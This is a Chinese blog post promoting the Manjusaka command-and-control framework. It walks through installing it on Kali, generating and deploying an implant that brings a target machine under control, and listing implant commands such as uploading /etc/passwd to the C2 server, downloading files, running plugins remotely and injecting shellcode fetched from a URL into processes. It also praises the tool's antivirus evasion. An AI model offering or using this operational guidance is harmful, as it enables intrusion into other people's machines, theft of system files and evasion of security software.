推荐一款基于 Web 界面的 C2 工具:Manjusaka
让我们一起探索一款基于 Web 界面的 C2 工具 – Manjusaka 吧!
系统架构
在 Kali 中安装
首先,在我们的 Kali 环境中克隆项目:
git clone https://github.com/YDHCUI/manjusaka.git chmod -R 777 manjusaka # 运行 ./manjusaka
初始日志中可以找到账号密码,每个人生成的密码及默认路由都不一样。
接下来,在浏览器中访问 http://ip:3200/manjusaka,即可看到登录界面,表示安装成功。
然后,根据终端提供的信息登录系统。
新建项目
默认有一个公共项目,可以通过项目状态开关控制项目是否启用。选择当前项目后,可在回传结果中查看当前项目回传的信息。当然,我们也可以创建自己的项目:
- 点击全局设置 – 目标设置 – 新建项目。
在内网环境中,只需填写 Kali 的 IP 地址。如果是公网服务器,可以填写公网 IP。
生成 Shell
点击生成 NPC,然后下载生成的 shell。
确保对其进行木马查杀,如火绒,以确保安全。
运行后,目标成功上线。
填坑:默认监听 80 端口,建议在 conf.toml 文件中修改为其他端口,因为 80 端口往往被其他应用如 Nginx 占用。
点击激活,可在 NPC 详情中显示相应的信息。
虚拟终端
常用的终端命令包括:
- help:打印帮助信息。
- ps:查看进程,例如 ps。
- ss:查看网络连接,例如 ss。
- ls:枚举文件,例如 ls /。
- cd:切换目录,例如 cd /。
- sh:执行系统命令,例如 sh ps -aux,sh tasklist。
- cat:读取文本,例如 cat a.txt。
- screen:执行截屏,例如 screen。
- wget:下载文件,例如 wget http://192.168.1.1/a.txt <a.txt>,文件名可选,默认当前目录。
- put:上传文件,例如 put /etc/passwd,将 passwd 文件上传到 NPS 服务器。
- start:执行插件可执行文件,例如 start name <args>,需要可执行文件在 plugins 目录下,会自动将插件传到目标机器上。
- pl:执行插件,例如 pl plugname <plugargs>,需要插件在 plugins 目录下。
- inject:注入进程,例如 inject pid <shellcodeurl>,shellcodeurl 可选,默认下载当前 shellcode 的下载链接。
文件管理
为了更好地展示,我们可以通过流程图形式展示文件管理过程。
总结
Manjusaka 工具是一款出色的 C2 工具,特别是在免杀方面。许多初学者在利用 CS 或 MSF 生成 shell 时,最头疼的问题就是免杀。同时,Manjusaka 还支持自定义开发插件,灵活性大大提高。
这就是 Manjusaka 的一些功能和优点,希望本文对你有所帮助!
暂无评论内容